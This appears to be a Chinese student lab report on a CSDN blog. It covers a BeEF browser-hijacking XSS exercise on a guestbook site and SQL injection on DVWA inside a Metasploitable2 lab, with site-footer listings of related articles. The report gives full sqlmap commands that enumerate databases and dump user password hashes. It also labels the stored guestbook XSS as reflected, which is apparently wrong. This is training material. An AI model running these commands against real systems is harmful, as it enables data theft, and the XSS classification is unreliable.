2020-12-01

最新推荐文章于 2023-04-18 12:17:22 发布
最新推荐文章于 2023-04-18 12:17:22 发布
阅读量139 收藏
点赞数
分类专栏: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52121537/article/details/110454210
版权

XSS部分:利用Beef劫持被攻击者客户端浏览器。
实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。
1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。
在这里插入图片描述
2、Kali使用beef生成恶意代码,截图。
在这里插入图片描述
3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

,截图。

在这里插入图片描述
在这里插入图片描述
4 管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。
在这里插入图片描述
在这里插入图片描述
5、回答问题:实验中XSS攻击属于哪种类型?
XSS属于反射型攻击

下页还有SQL注入,请继续!

SQL注入部分:DVWA+SQLmap+Mysql注入实战

实验环境搭建。启动Metasploitable2虚拟机。
1、注入点发现。首先肯定是要判断是否有注入漏洞。
在输入框输入1,返回
ID: 1
First name: admin
Surname: admin
返回正常;
再次输入1’,报错,返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1
此时可以断定有SQL注入漏洞,
http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#
下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
2、枚举当前使用的数据库名称和用户名。
在这里插入图片描述
在这里插入图片描述
你输入的命令:
sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=e97d01f188697a60e316f1c726480601’ -b --current-db --current-user
Sqlmap输出截图。
在这里插入图片描述
3、枚举数据库用户名和密码
你输入的命令:
sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=e97d01f188697a60e316f1c726480601’ --users --password

Sqlmap输出截图。
在这里插入图片描述
4、枚举数据库
–dbs:枚举当前数据库
你输入的命令:
sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=e97d01f188697a60e316f1c726480601’ --dbs

Sqlmap输出截图。
在这里插入图片描述
5、枚举数据库和指定数据库的数据表
-D 数据库名:指定数据库
–tables:枚举指定数据库的所有表
你输入的命令:
sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=e97d01f188697a60e316f1c726480601’ -D dvwa --tables

Sqlmap输出截图。
在这里插入图片描述
6、获取指定数据库和表中所有列的信息
-D:指定的数据库
-T:指定数据库中的数据表
–columns:获取列的信息
你输入的命令:
sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=e97d01f188697a60e316f1c726480601’ --string=“Surname” -D dvwa -T users --columns

Sqlmap输出截图。
在这里插入图片描述
7、枚举指定数据表中的所有用户名与密码,并down到本地。
-C:枚举数据表中的列
–dump:存储数据表项
你输入的命令:
sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=‘security=low;PHPSESSID=e97d01f188697a60e316f1c726480601’ --string=“Surname” -D dvwa -T users -C user,password --dump

Sqlmap输出截图。
在这里插入图片描述
查看down到本地的用户名与密码,截图。(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。)
在这里插入图片描述

weixin_52121537
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020-12-01-DVWA.md
01-24
dvwa之command
2020-12-01-葡萄酒项目
02-16
【标题】"2020-12-01-葡萄酒项目"可能是一个关于使用JavaScript技术构建的在线葡萄酒销售或管理平台的项目。这个项目的命名方式表明它是在202012月1日创建或更新的,可能是某个开发团队的工作成果或者是教学资源。...
【白帽子学习笔记】XSS和SQL注入
python_LC_nohtyp的博客
11-17 1546
【白帽子学习笔记】XSS和SQL注入 yysy姚总布置的实验报告越来越难写了,菜菜的我要写好久,┭┮﹏┭┮ 文章目录【白帽子学习笔记】XSS和SQL注入0x01 实验知识点1x01 什么是XSS?1x02 什么是Cookie?1x03 XSS漏洞的分类1x04 SQL注入攻击0x02 XSS部分:Beef1x01 搭建GuestBook网站1x02 AWVS扫描1x03 Kail中使用Beef生成恶意代码1x04 XSS注入漏洞2x01 XSS劫持网站2x02 劫持浏览器指定被劫持网站为学校主
web跨站脚本攻击(XSS)与sql注入攻击 实例
a116385895的博客
07-02 3188
免责申明:对于此内容仅是提供参考,用于开发人员针对黑客攻击做好安全防范 XSS攻击: 跨站脚本在英文中称为Cross-Site Scripting,缩写为CSS。但是,由于层叠样式表 (Cascading Style Sheets)的缩写也为CSS,为不与其混淆,特将跨站脚本缩写为XSS。 跨站脚本,顾名思义,就是恶意攻击者利用网站漏洞往Web页面里插入恶意代码,一般需要以下几个条件: 客户端访问的网站是一个有漏洞的网站,但是他没有意识到; 在这个网站中通过一些手段放入一段可以执行的代码,吸引客户
渗透测试之XSS漏洞:记一次模拟注入攻击
遇事不决 可问春风
09-18 2951
XSS(cross-site script)跨站脚本攻击是一种web应用程序前端漏洞。攻击者将代码注入,用户在使用时由浏览器对漏洞代码进行解析,从而达到恶意攻击用户的特殊目的。
BugKu Web WriteUp
AlexYoung28的博客
08-24 2200
Web 8 这道题的代码和前面的文件包含写的思路一样, 我们都是运用  php://input 写,来实现我们从文件中读出的数据和我们传入的数据一样。 我写的如下:  只要保证  $ac  的值 和我们写入文件  $fn 的值 一样即可, 我这里都写的是 123 细心 这道题刚开始看到主页之后,又看了源代码和抓了包,发现都没有什么特别的地方,所以,只有拿御剑扫描一下后台。 ...
xss-labs 通关笔记
Ewige的博客
06-30 470
靶场地址:传送门 概述: XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 反射型XXS是一种非持久性的攻击,它指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的目的。这里插入的恶意代码并没有保存在目标网站,需要引诱用户点击一个链接到目标网站的恶意链接来实施攻击。 原文链接:ht
gmall2020-mock-log-2020-04-01.jar
12-30
用户行为日志生成脚本
snapshot_2020-12-01_16-29.zip
12-08
标题中的"snapshot_2020-12-01_16-29.zip"暗示了这是一个特定时间点的软件快照,可能是为了保存或分享特定版本的OllyDbg及其相关资源。 OllyDbg的核心特性在于其直观的用户界面和对底层操作的深度洞察。它允许...
Spring_2020-12-01_入门.wmv
09-23
Spring_2020-12-01_入门.wmv
扫描sql注入与xss攻击的牛b工具
11-02
扫描sql注射与xss攻击的牛b工具,适合新手初入渗透测试使用的工具,很好有效辅助你们对网站的渗透测试。
预防XSS攻击和SQL注入XssFilter
07-23
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”。 二、XSS漏洞的危害 (1)网络钓鱼,包括盗取各类用户账号; (2)窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作; (3)劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、强制发表日志、发送电子邮件等; (4)强制弹出广告页面、刷流量等; (5)网页挂马; (6)进行恶意操作,例如任意篡改页面信息、删除文章等; (7)进行大量的客户端攻击,如DDoS攻击; (8)获取客户端信息,例如用户的浏览历史、真实IP、开放端口等; (9)控制受害者机器向其他网站发起攻击; (10)结合其他漏洞,如CSRF漏洞,实施进一步作恶; (11)提升用户权限,包括进一步渗透网站; (12)传播跨站脚本蠕虫等; 三、过滤器配置 web.xml配置 XssFilter com.xxx.Filter.XssFilter XssFilter /*
xssScanner-windows-version:python编写的的xss漏洞检测工具,selenium
05-16
xssScanner python编写的的xss漏洞检测工具,selenium 运行环境配置 xssScanner运行系统:windows 64位 开发语言:python 开发工具:pycharm xssScanner运行所需环境如下1-5所示: 1). python 2.7 2). mysql5.6 :执行xssScanner/installer/database.sql创建所需数据库并导入数据 3). firefox 59版本 4). python库: protobuf(3.0.0) mysql-connector-python(2.1.3) lxml(4.2.1) selenium (3.6.0) 5). selenium 火狐浏览器驱动geckodriver 0.20.1 mysql执行database.sql文件,实现数据库的创建和检测数据的导入。 使用说明 2.1 工具使用方
XSS跨站脚本攻击漏洞
weixin_43211186的博客
01-10 3060
XSS跨站脚本攻击漏洞 文章目录XSS跨站脚本攻击漏洞0x01 XSS 背景0x02 XSS 概论利用XSS漏洞XSS攻击的类型反射型XSS:存储型XSS:DOM型XSS:0x03 最常见的cookies类型a.Session Cookieb.Persistent Cookiec.Secure cookied.HttpOnly Cookiee.3rd-party cookief.Super Cookie0x04常见标签0x05 检测XSS的办法内容安全策略(CSP)输入文本验证库或框架XSSer 0x01
第18节 简单渗透测试流程及实验
m0_64378913的博客
01-03 2369
本文章仅供教学研究使用,切莫在真实环境中试验。本节主要围绕网络渗透流程这一主题,从概述入手介绍扫描漏洞、暴力破解、445漏洞利用之IPC$、留后门等主要步骤,随后对每个步骤采用一个小实验进行讲解分析。
[网安实践III] 实验1.渗透测试实验
LostUnravel的博客
11-09 5940
网安实践III - 实验1.渗透测试1 你的攻击机IP和靶机IP2 同组同学的姓名,同组同学的靶机msfadmin的密码,root的密码3 你是如何发现漏洞的?请写出发现漏洞的过程4 攻击利用的漏洞,以及攻击的过程。(写到如何获得shadow文件即可)5 获得靶机的shadow文件中msfadmin账号和root账号的内容6 靶机的msfadmin用户的密码,以及破解过程msfadmin密码破解过程7 靶机的root密码,以及破解过程root密码破解过程8 攻击流量包提交 1 你的攻击机IP和靶机IP 攻
【网络安全知识体系】外网渗透测试 | 14个小实验
热门推荐
04-18 1万+
【通俗易懂】外网渗透测试的流程&14个小实验带你了解网络安全
Kali网络渗透测试实验三——XSS和SQL注入
qq_45746876的博客
11-24 3328
XSS和SQL注入前言实验目的系统环境:Kali Linux 2、Windows ServerXSS部分:利用Beef劫持被攻击者客户端浏览器实验环境搭建1.利用AWVS扫描留言簿网站,发现其存在XSS漏洞2.Kali使用beef生成恶意代码3.访问http://留言簿网站,将恶意代码写入网站留言板4.管理员登录login.htm,账号密码均为admin,审核用户留言5.回答问题SQL注入部分:DVWA+SQLmap+Mysql注入实战sqlmap语法参考1.注入点发现2.枚举当前使用的数据库名称和用户名3
网络渗透测试实验一
m0_73936732的博客
11-22 680
网络渗透实验一
A集合: [{begintime:2020-01-01 00:04:00,endtime:2020-01-01 00:06:00}, {begintime:2020-01-01 00:01:05,endtime:2020-01-01 00:03:15}, {begintime:2020-01-01 00:09:00,endtime:2020-01-01 00:10:00}, {begintime:2020-01-01 00:07:35,endtime:2020-01-01 00:08:40}, {begintime:2020-01-01 00:12:00,endtime:2020-01-01 00:17:00}, {begintime:2020-01-01 00:12:05,endtime:2020-01-01 00:13:10}, {begintime:2020-01-01 00:19:00,endtime:2020-01-01 00:21:00}, {begintime:2020-01-01 00:15:20,endtime:2020-01-01 00:20:45}]  期望得到的输出结果: [{begintime:2020-01-01 00:01:05,endtime:2020-01-01 00:03:15}, {begintime:2020-01-01 00:04:00,endtime:2020-01-01 00:06:00}, {begintime:2020-01-01 00:07:35,endtime:2020-01-01 00:08:40}, {begintime:2020-01-01 00:09:00,endtime:2020-01-01 00:10:00}, {begintime:2020-01-01 00:12:00,endtime:2020-01-01 00:21:00}]
最新发布
04-23
2020-01-01 00:04:00,endtime:2020-01-01 00:06:00}, {begintime:2020-01-01 00:07:35,endtime:2020-01-01 00:08:40}, {begintime:2020-01-01 00:09:00,endtime:2020-01-01 00:10:00}, {begintime:2020-01-01 00:12:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值